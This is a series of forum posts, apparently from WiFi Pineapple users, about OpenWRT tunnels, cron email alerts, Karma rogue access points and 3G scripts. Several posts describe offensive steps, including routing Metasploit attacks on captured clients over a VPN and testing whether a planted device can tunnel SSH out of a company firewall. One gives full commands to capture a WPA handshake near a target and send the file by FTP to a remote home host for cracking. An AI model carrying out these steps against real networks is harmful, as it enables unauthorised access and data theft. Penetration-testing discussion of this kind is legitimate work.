Razzlerock

Hey guys. Good work saeed662 :-) Seb, I DO plan on doing a module for the VPN. I tried to create an account last week (on the WiFi Wiki) to submit modules, but I don't think it has been approved/created? Razzlerock

Forgot to mention, the TP-Link MR3020 is available internationally. Its a bit bigger than the 703N, has more LEDs and a 3-way switch. Maybe this is another alternative.... Razzlerock

Hi Darren, I tried to private messge you but got an error saying you are not receiving any news messages - you must be in high demand. :) Actually, the 703N (which is the 702N with more memory*) is certified - CE, FCC, RoHS according to the TP-Link website. In fact, you can buy this on www.tp-link.com in the US. My plan is not to stick this in an electrical enclosure at all, I will leave that to the end user B) The good part is, when I get something working on the 703N I am testing on the pineapple too and if it works post updates on the Pineapple forum - that way it is mutually beneficial and everyone wins :) Thanks Razzlerock * I need to validate this as I heard this second hand.

Interesting article - the TP-Link routers coupled with OpenWRT can be pretty powerful :-) I'm currently working on a product, due to be released (hopefully) January next year. It basically offers 3 main services; 1) Its an automated 'quick and dirty' pentester (email/SMS results). 2) Remote control/penetration testing (think VPN and/or reverse SSH) 3) Physical surveillance This is NOT competition to the WiFi pineapple. I only plan on making/selling 10 of these products, at $100 a piece. Very cool article. Razzlerock

Hey guys, sure thing - happy to share the love :-) I will write up a how-to shortly, watch this space! Razzlerock

Hey all, I posted about creating VPN tunnels a while back, see post below. http://forums.hak5.org/index.php?/topic/27765-suggestion-vpn-tunnel-module/page__hl__tunnel Note: If there is something out there similar to this and working, do not read ahead. However, I couldn't find something that was working properly. My initial post didn't seem to raise much interest, which really surprised me. The pineapple, as it stands, can attempt to attack/exploit clients using modules that are installed on the pineapple. This is great, and big thanks for all those who have developed these modules. The only issue I see is that attacks are limited to what the pineapple can support. Now, I know there are like 1000s of OPKG packages, BUT some stuff like Metasploit is simply irreplaceable in my opinion. Enter the VPN. The VPN is simply an extension of the pineapple network to your home PC. I configured a VPN between the pineapple (after some messing around) and my BT5 PC at home. Now, the pineapple has a routed VPN tunnel and my BT5 has fully IP reachability to all the wireless pwned clients. Any and all tools supported by BT5 can now be launched :) I successfully tested this just and was able to pwn a client PC via the VPN using Metasploit (pineapple was connected via 3g). I am not saying this is a replacement for modules, but I really do believe this is a game changer for the pineapple - the ability to lauch full on attacks remotely from a BT5 machine. Maybe, this calls for a 'mad props' from the main man Darren Kitchen (and Seb) ?? Razzlerock

Hey Seb. Its OK, I did this on a TP-Link running OpenWRT. To save messing up my one and only pineapple, I use the TP-Link WR703N purely for testing. Once I am happy that I have something working on there, I apply it to the pineapple. Although the two are not identical, I have found that the majority of the time stuff that works on the TP-Link also works on the pineapple (if it doesn't work, I know its something specific to the pineapple build/implementation). Hope this makes sense. P.S. Maybe I should buy a second 'test' pineapple.... B)

As I expected, the fix was right under my nose Of course, you can put startup commands in /etc/rc.local ! I did this, with a sleep 360 (6 minutes) in the .sh to allow the SSH tunnel to setup properly and hey presto it works a charm. root@(none):~ $ cat /etc/rc.local # Put your custom commands here that should be executed once # the system init finished. By default this file does nothing. /etc/ssmtp/ssh-check.sh exit 0 root@(none):~ $ Thanks digininja, you certainly helped me on the road to get this working - appreciate it man.

First, thanks man I appreciate the help - I spent a lot of time and effort trying to get this going. I simply want to run a script to run 5 minutes after it has booted. This will give the autossh time to connect. My script will then check if the ssh has connected, and if so send an email. I don't simply want to check every x minutes and send an email. Just one email after 6 minutes of power on is suffice. I hope this makes sense :-)

Excellent, thanks - it worked. Good man! The next problem, it looks like OpenWRT does not support '@reboot' in cron; root@(none):~ $ cat /etc/crontabs/root */2 * * * * ./ssh-keepalive.sh @reboot /etc/ssmtp/ssh-check.sh What are you thoughts? I have a 'sleep 360' in /etc/ssmtp/ssh-check.sh to give the SSH tunnel time to connect. Man, i feel so close to getting this working.

The full path to the script is there - /etc/ssmtp/send-email.sh ? Or do I mis understand you? Thanks for the help, look forward to hearing from you.

Hi guys, I'm pulling my hair out with this! I have a simple script (see below) to send an email; root@Pineapple:/usb/etc/ssmtp# cat send-email.sh ssmtp destinationemailaddress@test.com < /usb/etc/ssmtp/email-content root@Pineapple:/usb/etc/ssmtp# cat email-content To: destinationemailaddress@test.com; From: myemail@gmail.com; Subject: Pineapple has dialed home successfully; A check has confirmed you have dialled home. root@Pineapple:/usb/etc/ssmtp# If I launch this myself from the command line (see below), it works and I get an email; root@(none):~ $ /etc/ssmtp/send-email.sh root@(none):~ $ If I add to cron (see below) and reboot, the email is never sent! root@(none):~ $ cat /etc/crontabs/root */2 * * * * ./ssh-keepalive.sh */2 * * * * /etc/ssmtp/send-email.sh root@(none):~ $ The above should send an email every 2 minutes (I am using the 2 minute interval purely for testing). Can some PLEASE help me? Its driving me mad, surely it is simple? Thanks Razzlerock

BTW, I have tried the @reboot cron entry and it doesn't look like its supported. Can anyone verify? The plan was to invoke via cron on reboot using '@reboot' and then have 'sleep 600' at the start of the shell, effectively delaying the rest of the script for 10 minutes. This 'would' have given me the desired effect, but testing has so far shown no cigar.

Sorry to reply to my own post but I got this working (except the cron bit). Maybe this will help someone one day.... root@Pineapple:/usb/etc/ssmtp# ls email-content revaliases send-email.sh ssh-check.sh ssmtp.conf root@Pineapple:/usb/etc/ssmtp# cat ssh-check.sh #!/bin/sh # ----------------------------------------------------------------- # Simple script to send email if SSH is connected. # ----------------------------------------------------------------- logger "Check if SSH is established" if ! ( pidof autossh); then logger "SSH: Connection seemed to be down." else /usb/etc/ssmtp/send-email.sh & logger "SSH: Connection seems to be up. Issued /usb/etc/ssmtp/send-email.sh" fi root@Pineapple:/usb/etc/ssmtp# cat send-email.sh ssmtp destinationemailaddress@test.com < /usb/etc/ssmtp/email-content root@Pineapple:/usb/etc/ssmtp# cat email-content To: destinationemailaddress@test.com; From: myemail@gmail.com; Subject: Pineapple has dialed home successfully; A check has confirmed you have dialled home. root@Pineapple:/usb/etc/ssmtp# The only part I need to work out now, is if I can schedule to run in cron 10 minutes after a reboot (I don't want it to run every 15 mins.....) If I work this out, ill let you know. If you know how to do this, let me know. Razzlerock

Hi there. I got this working with the default script, but now I would like to use my own 'simple' script. It seems simple, but I cannot get it to work Basically, I want the pineapple to 'check' if an (auto)ssh connection has successfully connected (after 5 minutes of a reboot) - if it has I would like it to fire me an email. If it hasn't connected via ssh, I don't want an email. Why do I want this? When deploying on a site, I would like a way to know if the pineapple has been able to tunnel through a companies firewall - in other words, if they are permitting SSH. A simple cron check after 5 minutes of a reboot to check ssh and fire me an email saying its connected would be beautiful. If I don't get an email, I can assume that SSH is blocked.... P.S. I know I can use 3g (no company firewall restriction) and I know I can check the ssh connection on the pineapple by wireless connecting to it - in this scenario please consider that neither of these options are available. I was wondering if a simple 'pidof autossh' could be used? If there is no output (no ssh connection), do nothing. If there is output (see below) then there IS an SSH connection and trigger an email? I'd appreciate a few pointers please. root@Pineapple:~# pidof autossh 1972 root@Pineapple:~# Razzlerock Thanks Razzlerock

Loving this idea, sounds way cool. Keep us posted on progress!

The 'don't broadcast ssid' doesnt stop the SSID from functioning, it just means that you must 'know' the SSID before hand or wait for someone to connect to it and then you can see the SSID in the probes. The second command seems interesting. So you think this will effectively disable the use of an SSID but still allow Karma to work? That would be beautiful. Razzlerock

So, this F5U404PBLK Belkin - does it power Sandisk 4GB memory, Alfa NHA AND a 3G? Has anyone got all these 3 running concurrently and with success? If so I will buy one. I assume you just power it via a battery (I have an Anker battery). Please advise. Razzlerock

Ofcourse. YAFC does SCP B) FTP was shown purely as an example....see below (SSH can be read as SCP in this instance) root@Pineapple:~# yafc --help yafc 1.1.1 Copyright © 1998-2001 Martin Hedenfalk <mhe@home.se>. This is yet another FTP client. Usage: yafc [options] [[proto://][user[:password]@]hostname[:port][/directory] ...] proto can be either 'ftp' or 'ssh'

Hey guys, just a quick FYI that 'yafc' works very cleanly as an FTP client to transfer files to/from the pineapple and your home machine. opkg -d /usb/ install yafc I tested this over 3g autossh, capturing a PSK handshake and FTP'ing the captured file to my PC at home for further 'analysis'. Just thought this may interest someone.... This allows you to drop the pineapple near the target, sniff remotely, transfer the capture file and then crack the PSK using aircrack or similar tool - from the comfort of your leather chair at home (if you have one). As mentioned, this was all done over 3g..... # Turn card into monitor mode - I used an Alfa external card for this root@Pineapple:~# airmon-ng start wlan1 Interface Chipset Driver wlan1 RTL8187 rtl8187 - [phy1] (monitor mode enabled on mon0) wlan0 Atheros ath9k - [phy0] root@Pineapple:~# # Capture frames on channel 1 (that my target AP is using), save the capture file to my usb stick (/usb/captures with filename 'wpa') in pcap format (so that I can open in wireshark later). root@Pineapple:~# airodump-ng --channel 1 --write /usb/captures/wpa --output-format pcap mon0 # Once WPA handshake captured, stop the capture (CTRL+C) and verify you have the capture file; root@Pineapple:~# cd /usb/captures/ root@Pineapple:/usb/captures# ls wpa-01.cap root@Pineapple:/usb/captures# # Next, use yafc to transfer the capture file to your home PC; root@Pineapple:/usb/captures# yafc ftp username:password@myname.dyndns-at-home.com yafc 1.1.1 Copyright © 1998-2001 Martin Hedenfalk <mhe@home.se>. This program comes with ABSOLUTELY NO WARRANTY; for details type 'warranty'. This is free software; type 'copyright' for details. Looking up ftp... ftp: Unknown host Connecting to myname.dyndns-at-home.com (x.x.x.x) at port 21... 3Com 3CDaemon FTP Server Version 2.0 User logged in yafc myname.dyndns-at-home.com:/> put /usb/captures/wpa-01.cap /usb/captures/wpa-01.cap yafc myname.dyndns-at-home.com:/> Hey presto, you now have the capture file - try and crack the PSK..... Obviously there are many uses, but I think yafc is a must for stuff like this. Razzlerock

So, I worked out what I was doing wrong..... *sigh* I thought that the SSID you configured in 'Configuration' (Karma SSID) or using the Network Manager module was for management-only. Therefore, I set this to an SSID I knew, lets say 'my-wireless' with a PSK. I could now manage the pineapple wirelessly and securely with the PSK. This obviously breaks Karma (relies on open authentication). I set my wireless SSID 'my-wireless' back to open authentication, and now clients can connect when they probe for an SSID (Karma kicks in and says 'yes, im here'). Is there a way to configure no SSID? In other words, there is no need to configure an SSID because I do not want to use wireless for management. I want to use the wireless ONLY for karma so that clients that probe for an SSID will auto-connect to me. Any thoughts? Razzlerock

Yup, use a USB hub :-)

Hi legion. Have you managed to configure this on the pineapple successfully? The OpenVPN is 'apparently' supported but I cannot get to run, just wondered if the PPTP was 'proven'? Thanks Razzlerock

I'm seeing something similar on v2.7. I see lots and lots of probe requests (maybe 50) but only 1 client actually connected. I would say at least 20 of the SSIDs probed are open. Is Karma broke, or is it a client thing? I'd be interested to hear other thoughts, as Karma is 'THE' single most important tool for the pineapple and should be bullet proof. Razzlerock

Apologies for replies to my own post.... but did the 3g script change from v2.5 to V2.7? I re-used the 3g script (below) that was working on v2.5. If someone has the 'default' 3g script for v2.7 please post it (I don't want to re-flash just to find out the default 3g script!). #!/bin/sh # --------------------------------------------------------- # 3G Connection Script for WiFi Pineapple. "Does the thing" # # Version: 2012-02-17 # Supports: # # ZTE MF591 (T-Mobile) -dkitchen # Novatel MC760 (Virgin) -dkitchen # Novatel MC760 (Ting) -dkitchen # Sierra 598u (Ting) -brianzimm # And more. # # Updates: wifipineapple.com # --------------------------------------------------------- # ----------------------------------------------------------- # Configure /etc/ppp/options with hard-coded working settings # ----------------------------------------------------------- echo " logfile /dev/null noaccomp nopcomp nocrtscts lock maxfail 0" > /etc/ppp/options # -------------------------------------------------------------------------------------------------- # Check for known usb modem vendor and product IDs then switch 'em from storage to serial modem mode # -------------------------------------------------------------------------------------------------- echo "Searching for attached 3G Modems" logger "3G: Connection Script here, searching for modems" MODEM=$(lsusb | awk '{ print $6 }') echo $MODEM case "$MODEM" in *12d1:1506*) echo "Huawei E398 detected. Attempting mode switch" uci delete network.wan2 uci set network.wan2=interface uci set network.wan2.ifname=ppp0 uci set network.wan2.proto=3g uci set network.wan2.service=umts uci set network.wan2.device=/dev/ttyUSB0 uci set network.wan2.apn=telstra.internet uci set network.wan2.defaultroute=1 uci commit network usb_modeswitch -v 12d1 -p 1506 sleep 10; rmmod usbserial sleep 3; insmod usbserial vendor=0x12d1 product=0x1506 sleep 5; /etc/init.d/firewall disable; /etc/init.d/firewall stop logger "3G: firewall stopped" iptables -t nat -A POSTROUTING -s 172.16.42.0/24 -o 3g-wan2 -j MASQUERADE iptables -A FORWARD -s 172.16.42.0/24 -o 3g-wan2 -j ACCEPT iptables -A FORWARD -d 172.16.42.0/24 -m state --state ESTABLISHED,RELATED -i 3g-wan2 -j ACCEPT ;; esac